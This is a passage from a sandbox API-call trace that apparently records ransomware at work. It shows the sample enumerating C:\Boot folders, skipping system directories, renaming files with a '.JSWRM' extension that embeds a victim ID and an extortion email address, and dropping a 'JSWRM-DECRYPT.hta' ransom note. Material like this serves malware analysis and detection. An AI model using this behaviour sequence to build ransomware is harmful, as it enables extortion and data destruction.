lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0064.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0064.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.094] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.094] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561371328) returned 0 [0064.094] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.095] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.095] CloseHandle (hObject=0xffffffff) returned 1 [0064.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0064.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0064.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226230 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226230 | out: hHeap=0x1e0000) returned 1 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.096] MoveFileW (lpExistingFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.096] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdcc9ae, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cdcc9ae, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cdcc9ae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.096] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0064.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0064.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.097] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.097] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0064.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0064.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.097] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.097] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0064.097] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.097] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.097] CloseHandle (hObject=0xffffffff) returned 1 [0064.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0064.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0064.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.098] MoveFileW (lpExistingFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\pt-PT\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.098] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.098] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.098] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0064.098] lstrcmpiW (lpString1="qps-ploc", lpString2=".") returned 1 [0064.098] lstrcmpiW (lpString1="qps-ploc", lpString2="..") returned 1 [0064.098] lstrcmpiW (lpString1="qps-ploc", lpString2="...") returned 1 [0064.098] lstrcmpiW (lpString1="qps-ploc", lpString2="windows") returned -1 [0064.098] lstrcmpiW (lpString1="qps-ploc", lpString2="recovery") returned -1 [0064.098] lstrcmpiW (lpString1="qps-ploc", lpString2="perflogs") returned 1 [0064.099] lstrcmpiW (lpString1="qps-ploc", lpString2="documents and settings") returned 1 [0064.099] lstrcmpiW (lpString1="qps-ploc", lpString2="$RECYCLE.BIN") returned 1 [0064.099] lstrcmpiW (lpString1="qps-ploc", lpString2="system volume information") returned -1 [0064.099] lstrcmpiW (lpString1="qps-ploc", lpString2="msocache") returned 1 [0064.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0064.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.099] GetFileAttributesW (lpFileName="C:\\Boot\\qps-ploc\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\qps-ploc\\jswrm-decrypt.hta")) returned 0xffffffff [0064.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0064.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.226] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\qps-ploc\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.228] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.228] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.229] CloseHandle (hObject=0x450) returned 1 [0064.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0064.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.230] GetFileAttributesW (lpFileName="C:\\Boot\\qps-ploc\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\qps-ploc\\jswrm-decrypt.hta")) returned 0x20 [0064.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.230] FindFirstFileW (in: lpFileName="C:\\Boot\\qps-ploc\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cf23e2f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232200 [0064.230] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.230] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cf23e2f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.231] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.231] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.231] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 